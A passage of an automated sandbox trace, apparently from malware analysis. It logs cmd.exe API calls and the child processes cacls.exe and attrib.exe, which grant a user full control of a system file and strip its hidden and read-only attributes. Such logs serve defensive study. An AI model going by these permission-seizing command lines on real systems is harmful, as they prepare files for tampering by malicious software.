GetEnvironmentVariableW (in: lpName="KEYS", 
lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0150.293] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0150.293] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0150.293] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0150.293] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0150.293] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0150.293] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0150.293] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0150.293] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0150.293] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x26f760 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0150.293] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x26f760, lpFilePart=0x26f75c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x26f75c*="Desktop") returned 0x18 [0150.293] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0150.293] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x26f4dc | out: lpFindFileData=0x26f4dc) returned 0x320b50 [0150.293] FindClose (in: hFindFile=0x320b50 | out: hFindFile=0x320b50) returned 1 [0150.294] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x26f4dc | out: lpFindFileData=0x26f4dc) returned 0x320b50 [0150.294] FindClose (in: hFindFile=0x320b50 | out: hFindFile=0x320b50) returned 1 [0150.294] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x26f4dc | out: lpFindFileData=0x26f4dc) returned 0x320b50 [0150.294] FindClose (in: hFindFile=0x320b50 | out: hFindFile=0x320b50) returned 1 [0150.294] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0150.294] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" 
(normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0150.294] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0150.294] GetEnvironmentStringsW () returned 0x320370* [0150.294] FreeEnvironmentStringsW (penv=0x320370) returned 1 [0150.294] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0150.295] GetConsoleOutputCP () returned 0x1b5 [0150.295] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0150.295] GetUserDefaultLCID () returned 0x409 [0150.295] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0150.295] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x26f8a0, cchData=128 | out: lpLCData="0") returned 2 [0150.295] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x26f8a0, cchData=128 | out: lpLCData="0") returned 2 [0150.295] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x26f8a0, cchData=128 | out: lpLCData="1") returned 2 [0150.295] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0150.295] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0150.295] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0150.295] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0150.295] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0150.295] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0150.295] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0150.296] GetLocaleInfoW (in: 
Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0150.296] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0150.296] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0150.296] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0150.296] GetConsoleTitleW (in: lpConsoleTitle=0x310a00, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0150.297] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0150.297] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0150.297] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0150.297] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0150.297] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="EEBsYm5") returned 0x7 [0150.298] _wcsicmp (_String1="CACLS", _String2=")") returned 58 [0150.298] _wcsicmp (_String1="FOR", _String2="CACLS") returned 3 [0150.298] _wcsicmp (_String1="FOR/?", _String2="CACLS") returned 3 [0150.298] _wcsicmp (_String1="IF", _String2="CACLS") returned 6 [0150.298] _wcsicmp (_String1="IF/?", _String2="CACLS") returned 6 [0150.298] _wcsicmp (_String1="REM", _String2="CACLS") returned 15 [0150.298] _wcsicmp (_String1="REM/?", _String2="CACLS") returned 15 [0150.301] _wcsicmp (_String1="ATTRIB", _String2=")") returned 56 [0150.301] _wcsicmp (_String1="FOR", _String2="ATTRIB") returned 5 [0150.302] _wcsicmp (_String1="FOR/?", _String2="ATTRIB") returned 5 [0150.302] _wcsicmp (_String1="IF", _String2="ATTRIB") returned 8 [0150.302] _wcsicmp (_String1="IF/?", _String2="ATTRIB") returned 8 [0150.302] _wcsicmp (_String1="REM", _String2="ATTRIB") returned 17 [0150.302] _wcsicmp (_String1="REM/?", _String2="ATTRIB") 
returned 17 [0150.305] SetErrorMode (uMode=0x0) returned 0x0 [0150.305] SetErrorMode (uMode=0x1) returned 0x0 [0150.305] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x322018, lpFilePart=0x26f054 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x26f054*="Desktop") returned 0x18 [0150.305] SetErrorMode (uMode=0x0) returned 0x1 [0150.305] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0150.305] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0150.309] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0150.310] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x26edd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26edd0) returned 0xffffffff [0150.310] GetLastError () returned 0x2 [0150.310] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS", fInfoLevelId=0x1, lpFindFileData=0x26edd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26edd0) returned 0xffffffff [0150.310] GetLastError () returned 0x2 [0150.310] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x26edd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26edd0) returned 0x310f60 [0150.310] FindClose (in: hFindFile=0x310f60 | out: hFindFile=0x310f60) returned 1 [0150.311] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x26edd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26edd0) returned 0xffffffff [0150.311] GetLastError () returned 0x2 [0150.311] 
FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x26edd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26edd0) returned 0x310f60 [0150.311] FindClose (in: hFindFile=0x310f60 | out: hFindFile=0x310f60) returned 1 [0150.311] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0150.311] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0150.311] GetConsoleTitleW (in: lpConsoleTitle=0x26f2c8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0150.311] InitializeProcThreadAttributeList (in: lpAttributeList=0x26f150, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x26f218 | out: lpAttributeList=0x26f150, lpSize=0x26f218) returned 1 [0150.311] UpdateProcThreadAttribute (in: lpAttributeList=0x26f150, dwFlags=0x0, Attribute=0x60001, lpValue=0x26f210, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x26f150, lpPreviousValue=0x0) returned 1 [0150.311] GetStartupInfoW (in: lpStartupInfo=0x26f10c | out: lpStartupInfo=0x26f10c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0150.311] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0150.312] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png\" /E /G EEBsYm5:F /C ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x26f1ac*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="CACLS \"C:\\Users\\All 
Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png\" /E /G EEBsYm5:F /C ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x26f1f8 | out: lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png\" /E /G EEBsYm5:F /C ", lpProcessInformation=0x26f1f8*(hProcess=0x50, hThread=0x4c, dwProcessId=0x6d8, dwThreadId=0xcd4)) returned 1 [0150.315] CloseHandle (hObject=0x4c) returned 1 [0150.315] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0150.315] GetEnvironmentStringsW () returned 0x3204e0* [0150.315] FreeEnvironmentStringsW (penv=0x3204e0) returned 1 [0150.315] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0150.429] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x26f0ec | out: lpExitCode=0x26f0ec*=0x0) returned 1 [0150.429] CloseHandle (hObject=0x50) returned 1 [0150.429] _vsnwprintf (in: _Buffer=0x26f234, _BufferCount=0x13, _Format="%08X", _ArgList=0x26f0f8 | out: _Buffer="00000000") returned 8 [0150.429] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0150.429] GetEnvironmentStringsW () returned 0x322310* [0150.429] FreeEnvironmentStringsW (penv=0x322310) returned 1 [0150.429] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0150.429] GetEnvironmentStringsW () returned 0x322310* [0150.429] FreeEnvironmentStringsW (penv=0x322310) returned 1 [0150.429] DeleteProcThreadAttributeList (in: lpAttributeList=0x26f150 | out: lpAttributeList=0x26f150) [0150.429] GetConsoleTitleW (in: lpConsoleTitle=0x26f534, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0150.430] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, 
nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0150.430] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0150.430] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0150.430] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x26edd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26edd0) returned 0xffffffff [0150.430] GetLastError () returned 0x2 [0150.430] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB", fInfoLevelId=0x1, lpFindFileData=0x26edd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26edd0) returned 0xffffffff [0150.430] GetLastError () returned 0x2 [0150.430] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x26edd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26edd0) returned 0x31e540 [0150.430] FindClose (in: hFindFile=0x31e540 | out: hFindFile=0x31e540) returned 1 [0150.430] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x26edd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26edd0) returned 0xffffffff [0150.431] GetLastError () returned 0x2 [0150.431] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x26edd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26edd0) returned 0x31e540 [0150.431] FindClose (in: hFindFile=0x31e540 | out: hFindFile=0x31e540) returned 1 [0150.431] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0150.431] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0150.431] 
GetConsoleTitleW (in: lpConsoleTitle=0x26f2c8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0150.431] InitializeProcThreadAttributeList (in: lpAttributeList=0x26f150, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x26f218 | out: lpAttributeList=0x26f150, lpSize=0x26f218) returned 1 [0150.431] UpdateProcThreadAttribute (in: lpAttributeList=0x26f150, dwFlags=0x0, Attribute=0x60001, lpValue=0x26f210, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x26f150, lpPreviousValue=0x0) returned 1 [0150.431] GetStartupInfoW (in: lpStartupInfo=0x26f10c | out: lpStartupInfo=0x26f10c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0150.431] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0150.431] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x26f1ac*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x26f1f8 | out: lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\Device 
Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png\"", lpProcessInformation=0x26f1f8*(hProcess=0x4c, hThread=0x50, dwProcessId=0x678, dwThreadId=0xbd0)) returned 1 [0150.433] CloseHandle (hObject=0x50) returned 1 [0150.433] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0150.433] GetEnvironmentStringsW () returned 0x322470* [0150.433] FreeEnvironmentStringsW (penv=0x322470) returned 1 [0150.433] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0150.517] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x26f0ec | out: lpExitCode=0x26f0ec*=0x0) returned 1 [0150.517] CloseHandle (hObject=0x4c) returned 1 [0150.517] _vsnwprintf (in: _Buffer=0x26f234, _BufferCount=0x13, _Format="%08X", _ArgList=0x26f0f8 | out: _Buffer="00000000") returned 8 [0150.518] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0150.518] GetEnvironmentStringsW () returned 0x322470* [0150.518] FreeEnvironmentStringsW (penv=0x322470) returned 1 [0150.518] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0150.518] GetEnvironmentStringsW () returned 0x322470* [0150.518] FreeEnvironmentStringsW (penv=0x322470) returned 1 [0150.518] DeleteProcThreadAttributeList (in: lpAttributeList=0x26f150 | out: lpAttributeList=0x26f150) [0150.518] _get_osfhandle (_FileHandle=1) returned 0x7 [0150.518] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0150.518] _get_osfhandle (_FileHandle=1) returned 0x7 [0150.518] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0150.518] _get_osfhandle (_FileHandle=0) returned 0x3 [0150.518] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0150.519] SetConsoleInputExeNameW () returned 0x1 [0150.519] GetConsoleOutputCP () returned 0x1b5 [0150.519] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0150.519] 
SetThreadUILanguage (LangId=0x0) returned 0x409 [0150.519] exit (_Code=0) Process: id = "236" image_name = "cacls.exe" filename = "c:\\windows\\system32\\cacls.exe" page_root = "0x7ea168c0" os_pid = "0x6d8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "235" os_parent_pid = "0x170" cmd_line = "CACLS \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png\" /E /G EEBsYm5:F /C " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 19583 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 19584 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 19585 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 19586 start_va = 0x190000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 19587 start_va = 0x8d0000 end_va = 0x8d8fff entry_point = 0x8d0000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\System32\\cacls.exe" (normalized: "c:\\windows\\system32\\cacls.exe") Region: id = 19588 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: 
id = 19589 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 19590 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 19591 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 19592 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 19593 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 19594 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 19595 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 19596 start_va = 0x2e0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 19597 start_va = 0x350000 end_va = 0x44ffff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 19598 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 19599 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 
19600 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 19601 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 19602 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 19603 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 19604 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Thread: id = 298 os_tid = 0xcd4 Thread: id = 299 os_tid = 0xbcc Process: id = "237" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea168c0" os_pid = "0x678" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "235" os_parent_pid = "0x170" cmd_line = "ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" 
[0x7] Region: id = 19702 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 19703 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 19704 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 19705 start_va = 0x70000 end_va = 0xaffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 19706 start_va = 0xeb0000 end_va = 0xeb6fff entry_point = 0xeb0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 19707 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 19708 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 19709 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 19710 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 19711 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 19712 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 19713 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = 
